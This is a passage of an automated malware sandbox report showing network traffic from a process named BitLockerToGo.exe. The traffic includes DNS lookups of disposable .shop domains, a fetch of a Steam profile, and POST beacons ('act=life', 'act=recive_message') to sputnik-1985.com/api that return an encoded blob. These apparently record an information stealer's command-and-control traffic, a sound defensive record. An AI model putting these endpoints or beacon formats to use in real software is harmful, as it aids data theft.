                                                                                                                                                                                                          Jan 7, 2025 06:02:02.764393091 CET44349720104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.889736891 CET49721443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.889772892 CET44349721104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.889868021 CET49721443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.890182972 CET49721443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:02.890202045 CET44349721104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:03.345484972 CET44349721104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:03.345578909 CET49721443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:03.380902052 CET49721443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:03.380938053 CET44349721104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:03.381288052 CET44349721104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:03.382503986 CET49721443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:03.382595062 CET49721443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:03.382600069 CET44349721104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.152162075 CET44349721104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.152262926 CET44349721104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.152327061 CET49721443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.152424097 CET49721443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.152441978 CET44349721104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.202260017 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.202305079 CET44349722104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.202400923 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.202697992 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.202709913 CET44349722104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.676068068 CET44349722104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.676157951 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.677392960 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.677401066 CET44349722104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.677654982 CET44349722104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.678919077 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.678953886 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:04.678993940 CET44349722104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:05.172591925 CET44349722104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:05.172693014 CET44349722104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:05.172744989 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:05.172931910 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:05.172951937 CET44349722104.21.112.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:02:05.172960997 CET49722443192.168.2.12104.21.112.1
                                                                                                                                                                                                          Jan 7, 2025 06:02:05.172966957 CET44349722104.21.112.1192.168.2.12

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.176740885 CET5291453192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.186064959 CET53529141.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.190388918 CET5398753192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.198714018 CET53539871.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.201766014 CET6116453192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.210448027 CET53611641.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.213433981 CET6038253192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.222105026 CET53603821.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.224915981 CET5949153192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.233690023 CET53594911.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.235107899 CET6084353192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.243957043 CET53608431.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.245728016 CET5234453192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.254334927 CET53523441.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.257266998 CET5038153192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.265564919 CET53503811.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.268439054 CET5530553192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.277069092 CET53553051.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.278709888 CET5893153192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.286320925 CET53589311.1.1.1192.168.2.12
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.593055964 CET5154153192.168.2.121.1.1.1
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.625891924 CET53515411.1.1.1192.168.2.12

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.176740885 CET192.168.2.121.1.1.10xfeceStandard query (0)bootstringjl.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.190388918 CET192.168.2.121.1.1.10x82aaStandard query (0)nearycrepso.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.201766014 CET192.168.2.121.1.1.10x5672Standard query (0)abruptyopsn.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.213433981 CET192.168.2.121.1.1.10xd625Standard query (0)wholersorie.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.224915981 CET192.168.2.121.1.1.10x6596Standard query (0)framekgirus.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.235107899 CET192.168.2.121.1.1.10x751eStandard query (0)tirepublicerj.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.245728016 CET192.168.2.121.1.1.10xa94aStandard query (0)noisycuttej.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.257266998 CET192.168.2.121.1.1.10x753dStandard query (0)rabidcowse.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.268439054 CET192.168.2.121.1.1.10xed76Standard query (0)cloudewahsj.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.278709888 CET192.168.2.121.1.1.10xae93Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.593055964 CET192.168.2.121.1.1.10xb149Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.186064959 CET1.1.1.1192.168.2.120xfeceName error (3)bootstringjl.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.198714018 CET1.1.1.1192.168.2.120x82aaName error (3)nearycrepso.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.210448027 CET1.1.1.1192.168.2.120x5672Name error (3)abruptyopsn.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.222105026 CET1.1.1.1192.168.2.120xd625Name error (3)wholersorie.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.233690023 CET1.1.1.1192.168.2.120x6596Name error (3)framekgirus.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.243957043 CET1.1.1.1192.168.2.120x751eName error (3)tirepublicerj.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.254334927 CET1.1.1.1192.168.2.120xa94aName error (3)noisycuttej.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.265564919 CET1.1.1.1192.168.2.120x753dName error (3)rabidcowse.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.277069092 CET1.1.1.1192.168.2.120xed76Name error (3)cloudewahsj.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:53.286320925 CET1.1.1.1192.168.2.120xae93No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.625891924 CET1.1.1.1192.168.2.120xb149No error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.625891924 CET1.1.1.1192.168.2.120xb149No error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.625891924 CET1.1.1.1192.168.2.120xb149No error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.625891924 CET1.1.1.1192.168.2.120xb149No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.625891924 CET1.1.1.1192.168.2.120xb149No error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.625891924 CET1.1.1.1192.168.2.120xb149No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Jan 7, 2025 06:01:54.625891924 CET1.1.1.1192.168.2.120xb149No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                          • sputnik-1985.com

                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.1249714104.102.49.2544436484C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2025-01-07 05:01:54 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                          2025-01-07 05:01:54 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 05:01:54 GMT
                                                                                                                                                                                                          Content-Length: 35126
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: sessionid=16b2a9677645a01502d421c0; Path=/; Secure; SameSite=None
                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                          2025-01-07 05:01:54 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                          2025-01-07 05:01:54 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                          Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                          2025-01-07 05:01:54 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                          Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                          2025-01-07 05:01:54 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                          Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.1249715104.21.112.14436484C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2025-01-07 05:01:55 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                          2025-01-07 05:01:55 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                          2025-01-07 05:01:55 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 05:01:55 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=jmttgq25f5i0gqv4lrlk1f8r4f; expires=Fri, 02 May 2025 22:48:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAFrIjA%2BxZGtT9WNCWdcIg4WS9bDe3lBbA2qXAHAcG95fCv0%2Bq0PeBbDJKCb2Yq5zS5rj%2FMykrgj7Pi2XwkRjdMGU%2FHlWz2K%2BncvnofnemL%2BmZOH7hGQgf8ZPuoHtUqPLJjY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8fe16484b988424b-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1583&rtt_var=612&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1761158&cwnd=248&unsent_bytes=0&cid=11c546eca294e121&ts=594&x=0"
                                                                                                                                                                                                          2025-01-07 05:01:55 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                          2025-01-07 05:01:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.1249716104.21.112.14436484C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 86
                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 05:01:56 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hkks3fa9toggj8a2e70v4jnkfh; expires=Fri, 02 May 2025 22:48:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2M8biXwUHipSYSLbpdQ267hq0ZK%2F4iKH8mVLjZMLi%2FoyIFh5%2FT%2Fg40VkOD8faSRnRGj9EyQWV0R6AoPotlKx2x2IySqj4%2F2gIrCpW74ZnwjJN6XEm2hWU9nhVyPlba9ZNoNf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8fe1648a9ed8727b-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1930&rtt_var=726&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=986&delivery_rate=1505154&cwnd=234&unsent_bytes=0&cid=5e02e887371c0f2b&ts=484&x=0"
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC244INData Raw: 34 36 62 0d 0a 75 50 2b 57 66 6c 74 30 45 65 32 6e 63 34 33 61 4f 41 5a 58 72 54 4f 75 35 54 42 33 2b 41 7a 6f 65 59 53 46 76 76 6b 71 53 45 62 44 33 65 42 63 59 55 41 39 7a 39 51 57 72 2b 42 65 5a 7a 76 65 56 6f 4c 48 55 52 50 61 4e 6f 34 59 36 50 62 62 31 51 67 2b 4b 35 72 46 38 42 38 33 42 33 54 42 68 52 62 31 2b 41 4a 64 4c 49 39 57 77 4d 63 4b 56 5a 31 6d 69 68 6a 6f 35 39 2b 53 52 54 67 71 32 35 66 36 47 54 4d 52 63 6f 6e 47 48 2b 43 2f 58 57 4d 32 78 31 33 48 69 46 67 61 32 69 44 4b 48 50 36 6e 68 4e 74 6e 4c 54 4c 5a 73 76 63 4e 4d 46 5a 73 77 64 78 52 36 4c 51 61 50 48 58 4d 56 73 79 4a 56 68 4f 54 5a 49 41 52 34 4f 62 61 6b 31 6f 68 49 4e 43 58 39 42 6f 79 47 33 75 64 79 78 58 6e 74 46 74 70 4e 6f 38 66 6a 49 42
                                                                                                                                                                                                          Data Ascii: 46buP+Wflt0Ee2nc43aOAZXrTOu5TB3+AzoeYSFvvkqSEbD3eBcYUA9z9QWr+BeZzveVoLHURPaNo4Y6Pbb1Qg+K5rF8B83B3TBhRb1+AJdLI9WwMcKVZ1mihjo59+SRTgq25f6GTMRconGH+C/XWM2x13HiFga2iDKHP6nhNtnLTLZsvcNMFZswdxR6LQaPHXMVsyJVhOTZIAR4Obak1ohINCX9BoyG3udyxXntFtpNo8fjIB
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC894INData Raw: 4b 56 63 49 75 32 53 6e 6c 39 73 32 4f 52 54 6f 69 6d 6f 4b 36 42 58 6b 52 66 38 2b 64 55 65 65 30 56 47 45 32 77 46 62 4e 68 30 41 61 6d 6d 32 43 45 2b 4c 74 30 35 52 48 4a 43 37 64 6c 66 30 62 4e 68 46 37 69 63 6f 53 72 2f 59 61 59 79 32 50 43 59 79 6e 51 68 61 5a 65 6f 63 4b 70 76 69 53 67 67 67 74 4b 4a 72 46 74 42 6f 33 46 33 36 50 31 78 6e 6b 73 31 39 32 50 73 5a 63 77 59 64 66 48 35 56 74 69 68 7a 73 37 64 4f 52 54 43 63 70 33 4a 33 30 58 48 64 57 64 4a 65 46 53 61 2b 62 58 33 51 79 77 30 65 4f 76 52 49 4b 31 48 66 4b 48 4f 71 6e 68 4e 74 41 4c 79 66 5a 6c 76 73 66 4d 52 31 68 6a 39 63 58 34 72 31 49 59 6a 44 42 57 38 2b 56 57 42 75 63 62 59 4d 51 37 2b 4c 62 6e 77 68 6b 5a 4e 32 46 74 45 52 35 4e 33 36 45 79 52 76 34 75 42 70 37 65 39 59 52 79 34
